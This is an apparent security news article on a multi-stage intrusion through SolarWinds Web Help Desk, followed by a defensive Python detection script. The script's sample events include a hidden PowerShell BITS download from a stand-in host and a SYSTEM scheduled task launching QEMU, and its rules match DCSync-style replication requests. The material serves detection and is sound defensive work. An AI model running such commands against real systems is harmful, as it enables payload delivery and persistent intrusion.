Microsoft has disclosed that it witnessed a multi-phase intrusion in which the threat actors used internet-exposed SolarWinds Web Help Desk (WHD) instances to gain initial access before moving laterally across the organization's network to other valuable assets. However, it is unclear whether the activity exploited a previously patched vulnerability (CVE-2025-26399, CVSS score: 9.8) or recently revealed vulnerabilities (CVE-2025-40551, CVSS score: 9.8, and CVE-2025-40536, CVSS score: 8.1), according to the Microsoft Defender Security Research Team.
In a report released last week, the company stated, "We cannot reliably confirm the exact CVE used to gain an initial foothold because the attacks took place in December 2025 and on machines vulnerable to both the old and new set of CVEs at the same time."
CVE-2025-40551 and CVE-2025-26399 are both untrusted data deserialization vulnerabilities that could result in remote code execution, whereas CVE-2025-40536 is a security control bypass vulnerability that might enable an unauthenticated attacker to access some restricted functionality. Citing evidence of active exploitation in the wild, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) added CVE-2025-40551 to its Known Exploited Vulnerabilities (KEV) catalog last week. Agencies of the Federal Civilian Executive Branch (FCEB) were required to apply the fixes for the flaw by February 6, 2026.
The successful exploitation of the exposed SolarWinds WHD instance in the attacks that Microsoft discovered gave the attackers the ability to execute arbitrary commands within the WHD application context and accomplish unauthenticated remote code execution.
Researchers Sagar Patil, Hardik Suri, Eric Hopper, and Kajhon Soyini observed that "after successful exploitation, the compromised service of a WHD instance spawned PowerShell to leverage BITS [Background Intelligent Transfer Service] for payload download and execution." To gain continuous remote control over the compromised system, the threat actors proceeded to download authentic components linked to Zoho ManageEngine, a genuine remote monitoring and management (RMM) solution. As a follow-up, the attackers enumerated sensitive domain users and groups, including domain administrators.
The attackers established persistence via reverse SSH and RDP access, and also tried to set up a scheduled task that would start a QEMU virtual machine under the SYSTEM account at system startup, hiding their activity inside a virtualized environment while exposing SSH access through port forwarding. On certain hosts they employed DLL side-loading, launching a rogue DLL ("sspicli.dll") via "wab.exe," a legitimate system executable associated with the Windows Address Book, in order to steal credentials and dump the contents of LSASS memory. Microsoft claimed that in at least one instance, the threat actors carried out a DCSync attack, in which they impersonated a Domain Controller (DC) and requested password hashes and other sensitive data from the Active Directory (AD) database.
To counter the threat, users are advised to update WHD instances, identify and remove any unauthorized RMM tools, rotate admin and service accounts, and isolate compromised machines to contain the breach. According to the Windows manufacturer, "this activity reflects a common but high-impact pattern: when vulnerabilities are unpatched or inadequately monitored, a single exposed application can provide a path to full domain compromise." Throughout the intrusion the attackers relied heavily on low-noise persistence mechanisms, legitimate administrative tools, and living-off-the-land tactics.
These tradecraft choices underline the importance of defense in depth, prompt patching of internet-facing services, and behavior-based detection across the network, identity, and endpoint layers.
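The behavior-based detections the article calls for can be expressed as simple rules over endpoint and domain-controller telemetry. The following is an added example written for this page, not code from Microsoft, SolarWinds or the researchers quoted above. It encodes four of the behaviors described in the intrusion (the WHD service spawning PowerShell that uses BITS, wab.exe loading sspicli.dll from outside a Windows system directory, a SYSTEM scheduled task that launches QEMU at boot, and a non-DC account requesting AD replication rights as in DCSync) and runs them over a handful of constructed Sysmon-style and Windows Security events embedded in the script. The WHD install-path markers, every sample path and user name, and the rule names are assumptions made up for the demonstration; the two replication extended-right GUIDs are the well-known Active Directory values.

```python
"""Behavior-based detections for the tradecraft described in the article (added example).

Not code from Microsoft, SolarWinds or the cited researchers. Scans constructed
Sysmon-style events (1 = process creation, 7 = image load) and Windows Security
events (4662 = operation on an AD object). Paths, hosts, users and the WHD path
markers below are assumptions for this demonstration, not real telemetry.
"""
import re
from dataclasses import dataclass

# Assumption: the WHD service process path contains one of these markers.
WHD_PARENT_MARKERS = ("webhelpdesk", "solarwinds")
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
# Well-known AD extended-right GUIDs requested during directory replication.
DS_REPLICATION_GUIDS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes-All
}


@dataclass
class Event:
    event_id: int            # 1 = process create, 7 = image load, 4662 = AD object access
    host: str
    image: str = ""          # event 1: created process; event 7: the loading process
    parent_image: str = ""   # event 1 only
    command_line: str = ""   # event 1 only
    user: str = ""           # subject account
    image_loaded: str = ""   # event 7 only: DLL path
    properties: str = ""     # event 4662 only: requested access GUIDs


def _base(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def whd_spawns_powershell_bits(e: Event) -> bool:
    """WHD service -> PowerShell, with BITS used to fetch a payload."""
    if e.event_id != 1 or _base(e.image) not in ("powershell.exe", "pwsh.exe"):
        return False
    if not any(m in e.parent_image.lower() for m in WHD_PARENT_MARKERS):
        return False
    return re.search(r"bitstransfer|bitsadmin", e.command_line, re.I) is not None


def wab_sideloads_sspicli(e: Event) -> bool:
    """wab.exe loading sspicli.dll from anywhere other than a Windows system directory."""
    if e.event_id != 7 or _base(e.image) != "wab.exe" or _base(e.image_loaded) != "sspicli.dll":
        return False
    return not e.image_loaded.lower().startswith(SYSTEM_DIRS)


def system_task_starts_qemu(e: Event) -> bool:
    """schtasks creating a SYSTEM task at boot whose action launches QEMU."""
    if e.event_id != 1 or _base(e.image) != "schtasks.exe":
        return False
    cl = e.command_line.lower()
    return "/create" in cl and "qemu" in cl and ("/ru system" in cl or "/sc onstart" in cl)


def non_dc_requests_replication(e: Event) -> bool:
    """4662 with replication rights requested by an account that is not a machine account."""
    if e.event_id != 4662 or not any(g in e.properties.lower() for g in DS_REPLICATION_GUIDS):
        return False
    return not e.user.endswith("$")  # DC computer accounts end in '$' and replicate legitimately


RULES = {
    "whd_powershell_bits": whd_spawns_powershell_bits,
    "wab_sspicli_sideload": wab_sideloads_sspicli,
    "system_task_qemu": system_task_starts_qemu,
    "dcsync_like_replication": non_dc_requests_replication,
}


def detect(events):
    """Return (rule_name, host) pairs for every event that matches a rule."""
    return [(name, e.host) for e in events for name, rule in RULES.items() if rule(e)]


# Constructed sample telemetry: two benign events, then four matching the described chain.
SAMPLE_EVENTS = [
    Event(1, "ws07", image=r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
          parent_image=r"C:\Windows\explorer.exe", command_line="powershell.exe Get-Date",
          user="CORP\\alice"),
    Event(7, "ws07", image=r"C:\Program Files\Windows Mail\wab.exe",
          image_loaded=r"C:\Windows\System32\sspicli.dll"),
    Event(1, "whd01", image=r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
          parent_image=r"C:\Program Files\SolarWinds\WebHelpDesk\bin\tomcat.exe",  # assumed path
          command_line="powershell -nop -w hidden Start-BitsTransfer -Source http://example.invalid/x "
                       "-Destination C:\\Users\\Public\\x.exe",
          user="NT AUTHORITY\\SYSTEM"),
    Event(7, "ws12", image=r"C:\Users\Public\wab.exe", image_loaded=r"C:\Users\Public\sspicli.dll"),
    Event(1, "ws12", image=r"C:\Windows\System32\schtasks.exe",
          command_line=r"schtasks /create /tn Updater /sc onstart /ru SYSTEM "
                       r"/tr C:\Users\Public\qemu\qemu-system-x86_64.exe"),
    Event(4662, "dc01", user="CORP\\svc-backup", properties="{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}"),
]

if __name__ == "__main__":
    for name, host in detect(SAMPLE_EVENTS):
        print(f"{host}: {name}")
```

In production these rules need allowlists: the 4662 check should exclude known replication principals such as directory-sync service accounts, and the scheduled-task rule should be tuned to the task names an environment actually uses. Each rule maps to one step of the described chain, so a hit on the first rule alone is an early signal worth acting on before the later ones appear.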